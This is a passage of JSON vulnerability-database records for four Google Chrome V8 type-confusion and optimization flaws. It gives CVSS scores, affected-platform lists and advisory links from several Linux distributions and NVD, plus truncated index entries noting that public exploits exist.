"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2017-10-27T00:00:00", "id": "UB:CVE-2017-5070", "href": "https://ubuntu.com/security/CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T13:51:08", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T00:00:00", "id": "UB:CVE-2020-6418", "href": "https://ubuntu.com/security/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:42:30", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to\n72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a\nsandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T00:00:00", "type": "ubuntucve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2019-02-19T00:00:00", "id": "UB:CVE-2019-5782", "href": "https://ubuntu.com/security/CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-31T19:21:34", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-13764", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2022-03-31T17:26:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:suse:package_hub:-", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2019-13764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:suse:package_hub:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-06T21:33:39", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T05:29:00", "type": "cve", "title": "CVE-2017-5070", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2022-04-06T19:26:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2017-5070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-31T19:21:07", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "cve", "title": "CVE-2020-6418", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-03-31T17:12:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2020-6418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T23:52:05", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T17:29:00", "type": "cve", "title": "CVE-2019-5782", "cwe": ["CWE-787", "CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:30"], "id": "CVE-2019-5782", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-28T06:04:14", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "debiancve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2019-12-10T22:15:00", "id": "DEBIANCVE:CVE-2019-13764", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T23:33:09", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T05:29:00", "type": "debiancve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2017-10-27T05:29:00", "id": "DEBIANCVE:CVE-2017-5070", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-28T06:04:17", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "debiancve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T23:15:00", "id": "DEBIANCVE:CVE-2020-6418", "href": "https://security-tracker.debian.org/tracker/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-28T06:04:15", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T17:29:00", "type": "debiancve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2019-02-19T17:29:00", "id": "DEBIANCVE:CVE-2019-5782", "href": "https://security-tracker.debian.org/tracker/CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-02-01T05:17:45", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T01:22:53", "type": "redhatcve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2023-02-01T05:05:04", "id": "RH:CVE-2019-13764", "href": "https://access.redhat.com/security/cve/cve-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T23:28:07", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-06T07:56:11", "type": "redhatcve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2020-08-18T09:11:56", "id": "RH:CVE-2017-5070", "href": "https://access.redhat.com/security/cve/cve-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T08:14:11", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T07:44:08", "type": "redhatcve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2023-02-01T05:37:35", "id": "RH:CVE-2020-6418", "href": "https://access.redhat.com/security/cve/cve-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T05:20:32", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-01-30T10:19:58", "type": "redhatcve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2023-02-01T05:15:55", "id": "RH:CVE-2019-5782", "href": "https://access.redhat.com/security/cve/cve-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-07-07T00:13:22", "description": "# CVE-2019-13764\n\n## A full exploit written by Haboob Research T...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-27T08:30:00", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2022-07-06T23:37:53", "id": "882A81DB-33F9-5A22-8935-CC00EA6D1412", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-29T06:47:00", "description": "# CVE_2020_6418_PoC\nfor \u4f9b\u990a\n\nSandbox escape exploit not included....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-13T07:32:24", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-04-29T02:54:21", "id": "D253294E-AE35-5B65-8B7D-17D007162D00", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 